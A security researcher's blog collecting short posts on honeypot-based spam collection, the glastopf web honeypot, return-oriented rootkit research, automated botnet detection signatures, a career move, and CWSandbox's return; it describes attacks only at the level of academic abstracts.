honeyblog

A common technique employed by spammers is to send spam mails with the help of botnets. In a typical setting, the spammer uses so called template-based spamming: the attacker sends the bots a spam template that describes the structure of the spam message to be sent. Furthermore, the attacker sends meta-data like recipient list, subject list, and a list of URLs that are used to fill in variables in the template. The bots then construct an email based on the template and the meta-data, and send this email to the targets. As a result, the actual work of handling the SMTP communication is moved from the control server to the bots. Nowadays this technique is used by most large spam botnets, like Waledac, Bobax, Rustock, Cutwail, and a lot of the other major spam botnets as Joe Stewart explained in detail.

Since spammers nowadays use such a tactic, we can also collect spam mails in a more efficient way: Instead of waiting at the end-user's mailboxes or spamtraps for mail messages to arrive and then decide whether or not this is spam, we directly interact with the servers that are used to send spam messages. The basic idea is that we execute spambots, i.e., malicious software dedicated to sending spam emails, in a controlled (honeypot) environment and collect all email messages sent by the bots. This enables us to directly interfere with botnet control servers to collect current spam messages sent by a specific botnet.

We describe this idea in more detail in a short paper that was published at DIMVA'09. The paper is also available on this blog.

Abstract: With increasing security measures in network services, remote exploitation is getting harder. As a result, attackers concentrate on more reliable attack vectors like email: victims are infected using either malicious attachments or links leading to malicious websites. Therefore efficient filtering and blocking methods for spam messages are needed. Unfortunately, most spam filtering solutions proposed so far are reactive, they require a large amount of both ham and spam messages to efficiently generate rules to differentiate between both. In this paper, we introduce a more proactive approach that allows us to directly collect spam message by interacting with the spam botnet controllers. We are able to observe current spam runs and obtain a copy of latest spam messages in a fast and efficient way. Based on the collected information we are able to generate templates that represent a concise summary of a spam run. The collected data can then be used to improve current spam filtering techniques and develop new venues to efficiently filter mails.

Today Lukas commited some major changes to glastopf, his Google Summer of Code project. The goal of glastopf is to learn more about attacks against web applications, mainly by attracting remote file inclusion attacks. The new version now features a new parser that should be able to handle more attacks and respond in a more flexible way. Furthermore, the connection to a central database was improved and the daemon now also drops privileges after starting up.

The software is constantly collecting information and in the next couple of weeks more analysis tools will be implemented to also process the collected data. The current glastopf implementation logs status messages to Twitter: "Got 142 attacks in the last 30 minutes!". More than 13,000 IP addresses were observed and thousands of requests processed.

A paper that we will publish next month at USENIX Security'09 is entitled "Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms". In return-oriented programming, an attacker re-uses existing code: he searches for short instruction sequences (typically only one instruction) which are followed by a RET. By cleverly chaining these sequences, an attacker can build a gadget that then performs an actual computation, e.g., the gadget adds two operands. By combining these gadgets, an attacker can then perform arbitrary computations. Return-oriented programming was popularized by Shacham (CCS'07 paper targeting Linux/x86, CCS'08 paper targeting Solaris/SPARC). In our paper we present a system to automatically find useful instructions, build gadgets, and then generate a return-oriented program for Windows as the target OS. In a case study, we show how this system can be used to implement a return-oriented rootkit, bypassing typical kernel code integrity mechanisms. The main insight here is that integrity mechanisms protect against injection of code - however, if the attacker re-uses existing code, these approaches typically fail.

Abstract: Protecting the kernel of an operating system against attacks, especially injection of malicious code, is an important factor for implementing secure operating systems. Several kernel integrity protection mechanism were proposed recently that all have a particular shortcoming: They cannot protect against attacks in which the attacker re-uses existing code within the kernel to perform malicious computations. In this paper, we present the design and implementation of a system that fully automates the process of constructing instruction sequences that can be used by an attacker for malicious computations. We evaluate the system on different commodity operating systems and show the portability and universality of our approach. Finally, we describe the implementation of a practical attack that can bypass existing kernel integrity protection mechanisms.

The paper contains all the details and the results of our experiments are also available. The main part of this work was performed by Ralf Hund, it was the topic of his thesis. Furthermore, Felix Freiling helped with the project. And the word cloud was generated with the help of Wordle

One of the papers that we will publish at the European Symposium on Research in Computer Security (ESORICS'09) focusses on the problem of detecting bots within a given network. Previous research focussed for example on detecting bots using human-generated signatures and anomaly detectors (e.g., BotHunter) or correlating the activity of individual hosts in order to find machines that react in lockstep (e.g., BotMiner or TAMD). We present a system that automatically generates signatures which encapsulate the behavior of an infected machine. The important observation is that the principle behind bots is that they receive a command from the botherder and then respond in a specific way. Using real-world traces of many botnets we show that it is possible to spot the bot responses in the network traces using a change point detection algorithm. Based on this information we can then identify the commands and we use all information to then encode a signature which we map into Bro rules. Experiments in different networks show that this approach outperforms BotHunter. More information about the approach is available in the paper and all the gory details are published in a technical report.

Abstract: A botnet is a network of compromised hosts that is under the control of a single, malicious entity, often called the botmaster. We present a system that aims to detect bots, independent of any prior information about the command and control channels or propagation vectors, and without requiring multiple infections for correlation. Our system relies on detection models that target the characteristic fact that every bot receives commands from the botmaster to which it responds in a specific way. These detection models are generated automatically from network traffic traces recorded from actual bot instances. We have implemented the proposed approach and demonstrate that it can extract effective detection models for a variety of different bot families. These models are precise in describing the activity of bots and raise very few false positives.

This work is a collaboration with Peter Wurzinger, Leyla Bilge, Jan Goebel, Christopher Kruegel, and Engin Kirda. And the word cloud on the top of the posting is generated with the help of http://www.wordle.net/.

In the last few weeks I did not have much time to blog, my real life kept me busy. In the meantime, I finished my Ph.D. studies at the Laboratory for Dependable Distributed Systems and prepared my move to Vienna: I joined the International Secure Systems Lab (http://www.iseclab.org/) where I now work as a postdoc researcher. For now I stay in academia, let's see what the future brings. Basically I will continue my work on bots/botnets, honeypots/honeynets, malware analysis, and underground economy. In the next couple of days I will blog about some recent papers that we published - this will serve as the foundations of my work in the next months.

The public interface to CWSandbox at http://cwsandbox.org/ was offline for several weeks due to some internal problems, but the service is now online again. The backend was completely revised and a new database layout provides better scalability.